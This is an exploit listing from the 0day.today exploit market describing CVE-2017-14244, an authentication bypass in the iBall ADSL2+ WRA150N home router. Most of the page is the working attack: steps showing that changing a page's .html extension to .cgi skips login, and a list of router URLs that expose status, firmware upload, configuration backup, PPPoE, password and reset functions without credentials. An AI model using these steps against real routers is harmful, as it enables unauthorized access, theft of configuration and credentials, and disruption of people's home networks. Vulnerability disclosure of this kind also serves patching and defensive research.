[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

iBall ADSL2+ Home Router - Authentication Bypass Vulnerability

Author
Gem George
Risk
[
Security Risk High
]
0day-ID
0day-ID-28572
Category
web applications
Date add
18-09-2017
CVE
CVE-2017-14244
Platform
hardware
# Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability
# CVE: CVE-2017-14244
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746
# Firmware version: FW_iB-LR7011A_1.0.2
# Vendor Homepage: https://www.iball.co.in
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
 
 
Vulnerability Details
======================
iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.
 
How to reproduce
===================
Suppose 192.168.1.1 is the router IP and one of the valid page in router is is  http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
 
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
 
POC
=========
* https://www.youtube.com/watch?v=_SvrwCSdn54

#  0day.today [2024-12-27]  #